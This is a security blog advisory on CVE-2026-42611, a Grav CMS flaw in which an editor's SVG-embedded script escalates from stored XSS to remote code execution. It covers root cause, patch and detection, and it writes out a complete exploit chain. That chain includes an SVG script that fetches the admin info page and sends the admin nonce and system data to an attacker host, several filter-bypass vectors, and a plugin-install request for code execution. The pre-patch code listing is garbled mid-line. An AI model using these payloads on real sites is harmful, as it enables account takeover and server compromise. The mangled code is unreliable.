CVE-2026-42611: Grav CMS SVG Injection to RCE via Admin Nonce Chain

A low-privileged Grav CMS user can inject SVG payloads into page content, escalating stored XSS to full RCE by stealing admin nonces and chaining authenticated requests.

// PLAIN ENGLISH VERSION

Grav is a popular website-building platform that lets people create and manage websites without needing to understand complicated code. Like most web platforms, it has an admin area where trusted users can control the site's content and settings.

Researchers have discovered a serious security flaw in Grav versions before 2.0.0-beta.2. The problem starts small: lower-level staff members (those with basic editing permissions) can sneak malicious code into pages by disguising it as an image file. Think of it like a worker at a restaurant being able to hide a secret camera in the kitchen because no one checks what they bring in.

When a site administrator logs in and visits one of these poisoned pages, the hidden code springs to life. It silently steals sensitive information about the website's configuration and security tokens—essentially grabbing the master keys to the kingdom. An attacker can then use those stolen keys to take complete control of the server and do anything they want: delete files, steal data, or use the server to attack other targets.

This is particularly dangerous for organizations that run multiple websites or handle sensitive information. Small businesses and nonprofits using Grav should pay attention, since they often have limited security staff.

Here's what you should do immediately: First, check if you're running Grav and update to version 2.0.0-beta.2 or later as soon as possible. Second, if you can't update right away, restrict which staff members can create pages—only trust your most senior administrators. Third, review who has edit access to your website and remove anyone who doesn't genuinely need it. These steps dramatically reduce your risk while you work on getting fully patched.

Want the full technical analysis? Click "Technical" above.

▶ Attack flow — CVE-2026-42611 · Remote Code Execution

Vulnerability Overview

CVE-2026-42611 is a stored XSS-to-RCE chain in Grav CMS, a file-based PHP web platform. Any authenticated user with page-creation privileges — a role commonly granted to contributors and editors — can embed a raw <svg> element into page content. Grav's Markdown/HTML pipeline fails to sanitize SVG-embedded JavaScript, resulting in script execution in the browser context of any administrator who views the page.

The impact escalates beyond typical stored XSS because Grav's admin panel exposes a /admin/config/info endpoint that returns full system configuration, PHP environment details, and server internals without additional authentication checks beyond the session. The same XSS payload can exfiltrate the admin nonce — a CSRF token bound to the session — enabling the attacker to issue arbitrary authenticated admin API calls, including plugin installation and file writes, achieving Remote Code Execution. CVSS 8.9 (HIGH).

Root cause: Grav's page rendering pipeline passes raw HTML from Markdown content through the Twig templating engine without invoking a dedicated SVG/HTML sanitizer, allowing <svg onload=> and <svg><script> vectors to reach the browser DOM intact.

Affected Component

The vulnerable surface is Grav's page content renderer, specifically the interaction between the Parsedown Markdown parser (which permits inline HTML by default) and the Twig template layer that echoes page.content without escaping. All Grav versions prior to 2.0.0-beta.2 are affected.

Key files and components involved:

system/src/Grav/Common/Page/Medium/Medium.php — media embedding, no SVG stripping
system/src/Grav/Common/Twig/Extension/GravExtension.php — Twig filters, missing sanitize call on raw output
user/themes/*/templates/ — theme templates echo {{ page.content|raw }}
system/src/Grav/Common/Security.php — XSS detection logic that was bypassable via SVG namespace

Root Cause Analysis

Grav's Security::detectXss() method in Security.php scans page content for dangerous patterns before saving. The detection relied on a regex denylist that checked for common vectors like <script>, javascript:, and event handler attributes. SVG-specific vectors were not covered.

// Pseudocode reconstruction of Security::detectXss() — pre-patch
// system/src/Grav/Common/Security.php

bool Security::detectXss(string $content) {
    // BUG: denylist patterns do not cover SVG namespace vectors
    static patterns[] = {
        "/]/i",
        "/javascript:/i",
        "/on(load|click|error|mouseover)=/i",   // BUG: only matches attribute= form
        "/<script> and <svg onload=> with newline bypass reach here
}
</code></pre>

<p>The bypass is trivial. The pattern <code>/on(load|click|error|mouseover)=/i</code> requires the attribute name to be immediately followed by <code>=</code>. Inserting whitespace or a newline between the attribute name and its value — both valid HTML per spec — causes the regex to miss the match entirely.</p>

<pre><code class="language-c">// Bypass vectors that evade detectXss():

// Vector 1: SVG with newline-broken event handler
"<svg onload\n=alert(document.cookie)>"

// Vector 2: SVG with nested script element (not in denylist)
"<svg><script>fetch('/admin/config/info',{credentials:'include'}).then(r=>r.text()).then(d=>fetch('https://attacker.tld/?d='+btoa(d)))</script></svg>"

// Vector 3: SVG animate with href (executes in WebKit/Blink)
"<svg><animate attributeName=href values=javascript:alert(1) />"

// BUG: none of these match the static pattern list in detectXss()
</code></pre>

<p>Once the malicious page is saved, Twig renders it via <code>{{ page.content|raw }}</code>. The <code>|raw</code> filter explicitly disables Twig's auto-escaping, and no further sanitization pass runs at render time.</p>

<pre><code class="language-c">// Vulnerable Twig template pattern (user/themes/quark/templates/default.html.twig)
// Reconstructed — pre-patch

block content() {
    echo page.content | raw;   // BUG: raw filter suppresses auto-escape
                                // SVG payload reaches DOM unmodified
}
</code></pre>

<h2 class="article-h2">Exploitation Mechanics</h2>

<pre><code class="language-text">EXPLOIT CHAIN — CVE-2026-42611:

1. INITIAL ACCESS
   Attacker holds a low-privileged Grav account (editor/contributor role).
   Account can create or edit pages via /admin/pages.

2. PAYLOAD INJECTION
   Create new page. In page content (Markdown editor), insert:

   <svg><script>
   (function(){
     var x=new XMLHttpRequest();
     x.open('GET','/admin/config/info',true);
     x.withCredentials=true;
     x.onload=function(){
       var nonce=(x.responseText.match(/admin-nonce['":\s]+([a-f0-9]{32})/)||[])[1];
       var sys=btoa(x.responseText.substring(0,4096));
       fetch('https://attacker.tld/c?n='+nonce+'&s='+sys);
     };
     x.send();
   })();
   </script></svg>

   Save page. Grav's detectXss() does not flag <svg><script> — page saves cleanly.

3. TRIGGER
   Attacker shares page URL with Super Admin (social engineering, email link,
   or waits for admin content review workflow). Admin visits page while
   authenticated to /admin.

4. NONCE + SYSINFO EXFILTRATION
   Admin browser executes injected script.
   GET /admin/config/info — returns PHP version, server path, loaded extensions,
   Grav version, plugin list, user table, and the admin-nonce token.
   All data POSTed to attacker-controlled endpoint.

5. AUTHENTICATED PLUGIN INSTALL (RCE PIVOT)
   Using exfiltrated nonce, attacker issues:

   POST /admin/plugins/install
   Content-Type: application/x-www-form-urlencoded

   admin-nonce=<STOLEN>&package=file:///tmp/evil.zip

   Or via the data manager, write arbitrary PHP to user/plugins/evil/evil.php.

6. CODE EXECUTION
   Installed plugin's PHP executes on next page load.
   Full RCE as the web server user (www-data / nobody).
</code></pre>

<h2 class="article-h2">Memory Layout</h2>

<p>This is a web-layer vulnerability; there is no heap corruption. The relevant "layout" is the DOM state and the nonce extraction target within the admin info page response.</p>

<pre><code class="language-text">DOM STATE — Admin browser when visiting malicious page:

/admin/pages/evil-page (rendered):
┌─────────────────────────────────────────────────────┐
│  <div class="page-content">                         │
│    <svg>                                            │
│      <script>  ← injected, executes immediately    │
│        XMLHttpRequest → /admin/config/info          │
│      </script>                                      │
│    </svg>                                           │
│  </div>                                             │
└─────────────────────────────────────────────────────┘

/admin/config/info response body (partial):
┌─────────────────────────────────────────────────────┐
│  ...                                                │
│  "admin-nonce": "a3f1cc92b047e831d9204f0a1bce7712"  │← exfil target
│  "php_version": "8.2.10"                            │
│  "server_software": "Apache/2.4.57"                 │
│  "grav_root": "/var/www/html/grav"                  │← path disclosure
│  "user_accounts": ["admin","editor","attacker"]     │
│  "installed_plugins": ["admin","email","form",...]  │
└─────────────────────────────────────────────────────┘

ATTACKER SERVER RECEIVES:
GET /c?n=a3f1cc92b047e831d9204f0a1bce7712&s=<base64 sysinfo>
     ↑
     nonce valid for session duration — used immediately for plugin install POST
</code></pre>

<h2 class="article-h2">Patch Analysis</h2>

<p>The fix in <strong>2.0.0-beta.2</strong> operates at two levels: (1) <code>Security::detectXss()</code> gains SVG-aware patterns, and (2) the rendering pipeline adds an explicit sanitization pass using an allowlist-based HTML purifier.</p>

<pre><code class="language-c">// BEFORE (vulnerable) — Security::detectXss() pattern list:
static patterns[] = {
    "/<script[\s>]/i",
    "/javascript:/i",
    "/on(load|click|error|mouseover)=/i",   // incomplete event list, requires = immediately
    "/<iframe/i",
    "/<embed/i",
    // missing: svg, animate, use, foreignObject, xlink:href vectors
};

// AFTER (patched — 2.0.0-beta.2):
static patterns[] = {
    "/<script[\s\/>]/i",
    "/javascript\s*:/i",                    // handles whitespace before colon
    "/on\w+\s*=/i",                         // \w+ catches all event names; \s* handles newlines
    "/<\s*(iframe|embed|object|svg|math|animate|use)\b/i",  // SVG and MathML blocked at save
    "/xlink:href\s*=[^>]*javascript/i",
    "/<[^>]+style\s*=[^>]*(expression|javascript)/i",
};
</code></pre>

<pre><code class="language-c">// AFTER (patched) — Twig rendering layer adds sanitization:
// GravExtension.php — pageContentFilter()

string pageContentFilter(string $content, array $options) {
    if (Grav::instance()['config']->get('system.xss_protection.enabled', true)) {
        // NEW: strip dangerous HTML via HTMLPurifier with SVG profile disabled
        $purifier = HTMLPurifier::getInstance($purifier_config);
        $content  = $purifier->purify($content);   // SVG elements stripped at render time
    }
    return $content;
    // template still uses |raw but content is now pre-sanitized
}
</code></pre>

<pre><code class="language-c">// BEFORE — default.html.twig (all themes):
{{ page.content|raw }}

// AFTER — patched themes call the new filter:
{{ page.content|sanitize_xss|raw }}
// sanitize_xss Twig filter maps to pageContentFilter() above
</code></pre>

<p>The defense-in-depth approach is correct: block at save time <em>and</em> sanitize at render time. Either control alone is insufficient — save-time checks can be bypassed by direct file writes; render-time-only sanitization trusts stored data too late.</p>

<h2 class="article-h2">Detection and Indicators</h2>

<p><strong>Web server logs</strong> — look for admin nonce exfiltration patterns:</p>
<pre><code class="language-text"># Suspicious outbound from admin browser context:
GET /admin/config/info HTTP/1.1  (from same session as non-admin page view)

# Access log anomaly — admin info page fetched after non-admin page:
1.2.3.4 - editor [timestamp] "GET /grav/pages/some-page HTTP/1.1" 200
1.2.3.4 - admin  [timestamp] "GET /admin/config/info HTTP/1.1" 200   ← triggered by XSS
</code></pre>

<p><strong>File system</strong> — check for unexpected plugin directories:</p>
<pre><code class="language-text">find /var/www/html/grav/user/plugins -name "*.php" -newer /var/www/html/grav/user/plugins/admin -ls
</code></pre>

<p><strong>Grav page content</strong> — scan stored page Markdown files for injection:</p>
<pre><code class="language-text">grep -rn --include="*.md" -iE "<svg|<script|on\w+\s*=" user/pages/
</code></pre>

<h2 class="article-h2">Remediation</h2>

<ul>
  <li><strong>Upgrade immediately</strong> to Grav <strong>2.0.0-beta.2</strong> or any subsequent stable release that incorporates this patch.</li>
  <li>If upgrade is not immediately possible: <strong>restrict page-creation permissions</strong> to fully trusted users only. The attack requires an authenticated session with page write access.</li>
  <li>Deploy a WAF rule blocking <code>&lt;svg</code>, <code>&lt;script</code>, and <code>on\w+=</code> patterns in POST bodies to <code>/admin/pages</code>.</li>
  <li>Rotate any admin credentials and session secrets if exploitation is suspected — the nonce is session-scoped but full system info was exposed.</li>
  <li>Audit <code>user/pages/</code> for any <code>.md</code> files containing raw SVG or script elements, and audit <code>user/plugins/</code> for unexpected additions.</li>
  <li>Consider enabling Grav's built-in <strong>XSS protection</strong> setting (<code>system.yaml</code> → <code>xss_protection: true</code>) which was present but incomplete prior to the patch.</li>
</ul></div> <div class="mt-12 pt-8 border-t border-[var(--border)] flex items-center gap-4"> <div class="w-10 h-10 border border-green-base/40 flex items-center justify-center shrink-0"> <span class="font-mono text-green-base text-sm font-bold">CB</span> </div> <div> <div class="font-mono text-text-primary text-sm font-medium">CypherByte Research</div> <div class="font-mono text-text-muted text-xs">Mobile security intelligence · cypherbyte.io</div> </div> <div class="ml-auto"> <a href="https://x.com/intent/tweet?text=CVE-2026-42611%3A%20Grav%20CMS%20SVG%20Injection%20to%20RCE%20via%20Admin%20Nonce%20Chain&url=https://www.cypherbyte.io/blog/cve-2026-42611-grav-svg-xss-rce-chain" target="_blank" rel="noopener" class="font-mono text-text-muted text-xs border border-[var(--border)] px-3 py-1.5 hover:border-green-base/30 hover:text-text-secondary transition-colors">
Share on X →
</a> </div> </div> </article> <div class="border-t border-[var(--border)] max-w-4xl mx-auto px-6 py-10"> <div class="font-mono text-text-muted text-xs tracking-widest mb-4">// RELATED RESEARCH</div> <div class="grid grid-cols-1 md:grid-cols-3 gap-4"> <a href="/blog/cve-2026-5441-orthanc-psmct-rle1-oob-read" class="card p-4 group"> <span class="font-mono text-[10px] text-green-muted mb-2 block">CVE Analysis</span> <h3 class="text-text-primary text-sm font-medium leading-snug group-hover:text-green-bright transition-colors">CVE-2026-5441: OOB Read in Orthanc PSMCT_RLE1 Decoder Leaks Heap</h3> </a><a href="/blog/cve-2026-0029-pkvm-init-vm-privilege-escalation" class="card p-4 group"> <span class="font-mono text-[10px] text-green-muted mb-2 block">CVE Analysis</span> <h3 class="text-text-primary text-sm font-medium leading-snug group-hover:text-green-bright transition-colors">CVE-2026-0029: pKVM __pkvm_init_vm Logic Error Enables Local EoP</h3> </a><a href="/blog/cve-2026-5760-sglang-rerank-jinja2-rce" class="card p-4 group"> <span class="font-mono text-[10px] text-green-muted mb-2 block">CVE Analysis</span> <h3 class="text-text-primary text-sm font-medium leading-snug group-hover:text-green-bright transition-colors">CVE-2026-5760: SGLang Rerank Endpoint RCE via Unsandboxed Jinja2</h3> </a> </div> </div><div class="max-w-4xl mx-auto px-6 pb-8"> <div class="border border-green-base/20 bg-green-base/4 p-6"> <div class="font-mono text-green-base text-xs tracking-widest mb-2">// WEEKLY INTEL DIGEST</div> <p class="text-text-secondary text-sm mb-4">Get articles like this every Friday — mobile CVEs, threat research, and security intelligence.</p> <a href="/newsletter" class="btn-primary">Subscribe Free →</a> </div> </div>  <div class="max-w-4xl mx-auto px-6 pb-16"> <div class="border border-[var(--border)] bg-[var(--bg-surface)] p-5"> <div class="font-mono text-[var(--text-muted)] text-[10px] tracking-widest mb-3">// TOOLS USED BY SECURITY PROFESSIONALS</div> <div class="grid grid-cols-1 sm:grid-cols-3 gap-3"> <a href="https://go.nordvpn.net/aff_c?offer_id=15&aff_id=145731&url_id=902" target="_blank" rel="noopener sponsored" class="border border-[var(--border)] p-3 hover:border-[var(--accent)] transition-colors group"> <div class="font-mono text-[var(--accent)] text-xs font-bold mb-1 group-hover:underline">NordVPN →</div> <p class="text-[var(--text-muted)] text-[11px] leading-relaxed">Encrypt your traffic. Used by researchers to stay private against the exact threats we cover.</p> </a> <a href="https://go.nordpass.io/aff_c?offer_id=488&aff_id=145731&url_id=9356" target="_blank" rel="noopener sponsored" class="border border-[var(--border)] p-3 hover:border-[var(--accent)] transition-colors group"> <div class="font-mono text-[var(--accent)] text-xs font-bold mb-1 group-hover:underline">NordPass →</div> <p class="text-[var(--text-muted)] text-[11px] leading-relaxed">Stop credential theft before it starts. Password manager from Nord Security.</p> </a> <a href="https://go.saily.site/aff_c?offer_id=101&aff_id=13653" target="_blank" rel="noopener sponsored" class="border border-[var(--border)] p-3 hover:border-[var(--accent)] transition-colors group"> <div class="font-mono text-[var(--accent)] text-xs font-bold mb-1 group-hover:underline">Saily eSIM →</div> <p class="text-[var(--text-muted)] text-[11px] leading-relaxed">Travel without exposing your real SIM. eSIM data for 150+ countries, 10% off with our link.</p> </a> </div> <p class="font-mono text-[9px] text-[var(--text-dim)] mt-2">Affiliate links — commission earned at no cost to you. We only recommend tools we trust.</p> </div> </div> <script>
function showTechnical() {
  document.getElementById('technicalBody').classList.remove('hidden');
  if (document.getElementById('plainEnglishBody')) {
    document.getElementById('plainEnglishBody').classList.add('hidden');
  }
  document.getElementById('btnTechnical').classList.add('bg-[var(--card-hover-bg)]','text-[var(--accent)]');
  document.getElementById('btnTechnical').classList.remove('text-[var(--text-muted)]');
  document.getElementById('btnPlain').classList.remove('bg-[var(--card-hover-bg)]','text-[var(--accent)]');
  document.getElementById('btnPlain').classList.add('text-[var(--text-muted)]');
  document.getElementById('modeLabel').textContent = 'Technical mode — for security professionals';
}
function showPlain() {
  document.getElementById('technicalBody').classList.add('hidden');
  if (document.getElementById('plainEnglishBody')) {
    document.getElementById('plainEnglishBody').classList.remove('hidden');
  }
  document.getElementById('btnPlain').classList.add('bg-[var(--card-hover-bg)]','text-[var(--accent2)]');
  document.getElementById('btnPlain').classList.remove('text-[var(--text-muted)]');
  document.getElementById('btnTechnical').classList.remove('bg-[var(--card-hover-bg)]','text-[var(--accent)]');
  document.getElementById('btnTechnical').classList.add('text-[var(--text-muted)]');
  document.getElementById('modeLabel').textContent = 'Plain English mode — no jargon, real impact';
}
</script> <div id="article-gate" class="gate-hidden" aria-modal="true" role="dialog" aria-label="Subscribe to continue reading" data-astro-cid-jujjoiif> <!-- Backdrop --> <div class="gate-backdrop" id="gate-backdrop" data-astro-cid-jujjoiif></div> <!-- Bottom sheet style gate (like Medium) --> <div class="gate-sheet" id="gate-sheet" data-astro-cid-jujjoiif> <!-- Gradient fade over content --> <div class="gate-fade" data-astro-cid-jujjoiif></div> <!-- Gate content --> <div class="gate-content" data-astro-cid-jujjoiif> <div class="gate-inner" data-astro-cid-jujjoiif> <!-- Brand --> <div class="gate-brand" data-astro-cid-jujjoiif> <span class="gate-logo" data-astro-cid-jujjoiif>CB</span> <span class="gate-brand-name" data-astro-cid-jujjoiif>CypherByte</span> </div> <!-- Headline --> <h2 class="gate-headline" data-astro-cid-jujjoiif>
You've read 2 free articles this session.
</h2> <p class="gate-sub" data-astro-cid-jujjoiif>
Get the weekly mobile threat briefing — CVEs, exploit research, and security intelligence. Free, no spam.
</p> <!-- Subscribe form --> <div class="gate-form" id="gate-form" data-astro-cid-jujjoiif> <input type="email" id="gate-email" placeholder="your@email.com" autocomplete="email" inputmode="email" class="gate-input" aria-label="Email address" data-astro-cid-jujjoiif> <button id="gate-submit" class="gate-btn" type="button" data-astro-cid-jujjoiif>
Subscribe free →
</button> </div> <p id="gate-msg" class="gate-msg" aria-live="polite" data-astro-cid-jujjoiif></p> <!-- Dismiss --> <button id="gate-dismiss" class="gate-dismiss" type="button" data-astro-cid-jujjoiif>
Continue reading without subscribing
</button> <p class="gate-disclaimer" data-astro-cid-jujjoiif>No spam. Unsubscribe anytime.</p> </div> </div> </div> </div>    </main> <!-- ── Footer ───────────────────────────────────────────── --> <footer class="cb-footer"> <div class="max-w-7xl mx-auto px-6 py-12"> <div class="grid grid-cols-1 md:grid-cols-3 gap-10"> <div> <div class="cb-footer-brand">CYPHERBYTE</div> <p class="cb-footer-desc">
Mobile security intelligence. Real-time vulnerability tracking and threat analysis for the AI era.
</p> <a href="https://x.com/cypherbyte" target="_blank" rel="noopener" class="cb-footer-link mt-4 inline-block">@cypherbyte</a> </div> <div> <div class="cb-footer-heading">// NAVIGATION</div> <div class="space-y-2"> <a href="/" class="cb-footer-link block">_home</a> <a href="/tracker" class="cb-footer-link block">_vulnerability tracker</a> <a href="/blog" class="cb-footer-link block">_intel reports</a> <a href="/newsletter" class="cb-footer-link block">_subscribe to digest</a> </div> </div> <div> <div class="cb-footer-heading">// FOCUS AREAS</div> <div class="space-y-2"> <div class="cb-focus-item"> <span class="cb-focus-arrow">&#9658;</span> Android security </div><div class="cb-focus-item"> <span class="cb-focus-arrow">&#9658;</span> Mobile pentesting </div><div class="cb-focus-item"> <span class="cb-focus-arrow">&#9658;</span> CVE analysis </div><div class="cb-focus-item"> <span class="cb-focus-arrow">&#9658;</span> Exploit research </div><div class="cb-focus-item"> <span class="cb-focus-arrow">&#9658;</span> Threat intelligence </div><div class="cb-focus-item"> <span class="cb-focus-arrow">&#9658;</span> Fintech mobile sec </div> </div> </div> </div> <!-- Affiliate strip --> <div class="border-t border-[var(--border)] mt-10 pt-8"> <div class="font-mono text-[var(--text-dim)] text-[9px] tracking-widest mb-4">// RECOMMENDED TOOLS</div> <div class="flex flex-wrap gap-4"> <a href="https://go.nordvpn.net/aff_c?offer_id=15&aff_id=145731&url_id=902" target="_blank" rel="noopener sponsored" class="font-mono text-[11px] text-[var(--text-muted)] hover:text-[var(--accent)] transition-colors">
NordVPN →
</a> <a href="https://go.nordpass.io/aff_c?offer_id=488&aff_id=145731&url_id=9356" target="_blank" rel="noopener sponsored" class="font-mono text-[11px] text-[var(--text-muted)] hover:text-[var(--accent)] transition-colors">
NordPass →
</a> <a href="https://go.saily.site/aff_c?offer_id=101&aff_id=13653" target="_blank" rel="noopener sponsored" class="font-mono text-[11px] text-[var(--text-muted)] hover:text-[var(--accent)] transition-colors">
Saily eSIM →
</a> <span class="font-mono text-[9px] text-[var(--text-dim)] self-center">affiliate links</span> </div> </div> <div class="cb-footer-bottom"> <span>© 2026 CypherByte. All rights reserved.</span> <span>Built for defenders. Powered by research.</span> </div> </div> </footer> <script>
    // Theme toggle
    const btn  = document.getElementById('themeToggle');
    const icon = document.getElementById('themeIcon');
    const root = document.documentElement;
    function updateIcon() {
      const isLight = root.classList.contains('light');
      icon.textContent = isLight ? '☽' : '☀';
    }
    updateIcon();
    btn.addEventListener('click', function() {
      root.classList.toggle('light');
      localStorage.setItem('cb-theme', root.classList.contains('light') ? 'light' : 'dark');
      updateIcon();
    });

    // Mobile menu
    const ham  = document.getElementById('hamburger');
    const menu = document.getElementById('mobileMenu');
    ham.addEventListener('click', function() {
      menu.classList.toggle('open');
      ham.classList.toggle('open');
      const isOpen = menu.classList.contains('open');
      document.getElementById('ham-icon').style.display   = isOpen ? 'none'  : 'block';
      document.getElementById('close-icon').style.display = isOpen ? 'block' : 'none';
    });
  </script> </body> </html>